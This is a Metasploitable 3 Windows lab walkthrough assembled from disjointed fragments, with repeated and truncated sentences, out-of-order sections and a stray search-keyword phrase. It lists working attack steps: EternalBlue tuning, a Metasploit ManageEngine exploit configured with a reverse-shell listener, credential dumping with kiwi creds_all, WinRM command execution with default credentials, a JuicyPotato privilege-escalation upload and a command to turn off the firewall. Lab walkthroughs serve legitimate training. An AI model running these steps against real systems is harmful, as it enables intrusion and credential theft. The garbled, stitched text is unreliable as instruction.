We start with a quick Nmap scan to identify open ports and running services.
When applications load DLLs without specifying absolute paths, Windows searches for them in a specific order. An attacker with write access to a directory earlier in the search path can plant a malicious DLL that gets loaded by a privileged process.
Once you have the target IP, run a comprehensive port scan:
| Problem | Solution | |---------|----------| | VM won’t build | Use Hyper-V (not VirtualBox). Run vagrant up --provider=hyperv | | EternalBlue crashes target | Increase GroomAllocations to 12, set VerifyTarget to false | | Firewall blocks reverse shell | Inside VM – netsh advfirewall set allprofiles state off | | Tomcat 404 after deploy | Ensure context path matches WAR filename. Use /shell as context. |
Use the exploit module designed for Jenkins script consoles: metasploitable 3 windows walkthrough
Using the information gathered during the reconnaissance phase, we can now identify potential vulnerabilities in the system. One notable vulnerability is the SMB service, which is running on port 445. Metasploitable 3 Windows has a known vulnerability in the SMB service that can be exploited using the EternalBlue exploit.
meterpreter > ls meterpreter > sysinfo meterpreter > getuid
load kiwi creds_all
msf6 > use exploit/windows/http/manageengine_desktop_central_rce msf6 exploit(windows/http/manageengine_desktop_central_rce) > set RHOST 10.0.2.6 msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LHOST 10.0.2.15 msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LPORT 4444 msf6 exploit(windows/http/manageengine_desktop_central_rce) > run We start with a quick Nmap scan to
The holy grail of Windows exploitation is the SAM database.
crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"
Metasploitable 3 was designed to be built from source using Vagrant and Packer, but community tools have simplified the process significantly.
You might find your actual host machine. Once you have the target IP, run a
The presence of WinRM (port 47001) and SMB signing disabled will be our eventual keys to the kingdom.
To make this walkthrough smooth, set both VMs to a (or a custom NAT network). This isolates the carnage from your physical router.
sessions
upload JuicyPotato.exe C:\temp\